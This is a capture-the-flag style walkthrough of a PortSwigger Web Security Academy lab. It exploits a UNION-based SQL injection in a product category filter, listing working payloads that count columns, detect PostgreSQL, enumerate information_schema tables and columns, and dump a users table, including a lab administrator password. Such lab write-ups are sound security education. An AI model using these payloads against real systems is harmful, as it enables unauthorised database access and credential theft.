This lab contains an [SQL injection](https://portswigger.net/web-security/sql-injection) vulnerability in the product category filter. The results from the query are returned in the application's response so you can use a UNION attack to retrieve data from other tables.

The application has a login function, and the database contains a table that holds usernames and passwords. You need to determine the name of this table and the columns it contains, then retrieve the contents of the table to obtain the username and password of all users.

To solve the lab, log in as the `administrator` user.

# Practical
Let's view how the functionality of the website.
The only URL we can get from this site is
```html
https://ac921f101fa13c6780bf24ce006700e9.web-security-academy.net/filter?category=Pets
```
So let's test it for vulnerabilities.
And we get an error indicating vulnerability. Let's try this with a UNION attack. Lets first determine the number of columns and data types.
```sql 
' ORDER BY 1--
```
And again we get an error, let's try this in Burp with URL encoding.
```sql
'+ORDER+BY+1--
```
And no errors, so it must be url encoded.
Trying with 2 also no errors, but breaks at 3.

Let's try the second method now.
```sql
'UNION+SELECT+NULL,NULL,NULL--
```
With 3 NULLs it breaks the app but with 2 it is fine so it is confirmed the database has 2 columns.

Next, we need to determine the datatype. Since we need to login, we're interested in strings.
To do this, insert string into any NULL positions to check for strings.
```sql
'UNION+SELECT+'a',NULL--
```
First column is a string, how about second.
```sql
'UNION+SELECT+'a','b'--
```
Second column is a string also.

Now let's check what the type of database it's using.Since it's non-Oracle there's only 3 choices so let's test them all.
```sql
SELECT @@version
```
It's not Microsoft and it is PostgreSQL, let's craft our payload to check the version of it.
```sql
'UNION+SELECT+version(),NULL--
```
And we got this response:
```txt
PostgreSQL 11.12 (Debian 11.12-1.pgdg90+1) on x86_64-pc-linux-gnu, compiled by gcc (Debian 6.3.0-18+deb9u1) 6.3.0 20170516, 64-bit
```
Now we just need the name of the database and table. Let's check the cheat sheet.
```sql
SELECT * FROM information_schema.tables  
SELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME-HERE'
```
So we need the tables first and then the columns. Let's google how to do that.
Stumbled upon the PostgreSQL documentation, great.
```txt
table_name|sql_identifier|Name of the table
```
This is what we want.
Let's craft our payload.
```sql
' UNION SELECT table_name,NULL FROM information_schema.tables--
```
And we are presented with a list of tables, we need to find the one with users, probably has the word users on it?
```txt
users_tnwian
```
Perhaps this, let's check further. 
Let's see how we can check columns name from a table.
```txt
column_name|sql_identifier|Name of the column
```
Let's craft our payload again.
```sql
' UNION SELECT column_name,NULL FROM information_schema.columns WHERE table_name='users_tnwian'--
```
It worked and we're now given 2 columns
```txt
password_bxytky
username_fwkqyf
```
Now we just need to get it easily, let's craft our last payload.
```sql
' UNION SELECT username_fwkqyf,password_bxytky FROM users_tnwian--
```
And we are greeted with list of usernames and password but we're interested in administrator so let's get that
```txt
administrator.ul1yabksmn9qm8a5me5a
```
Let's login to solve the lab.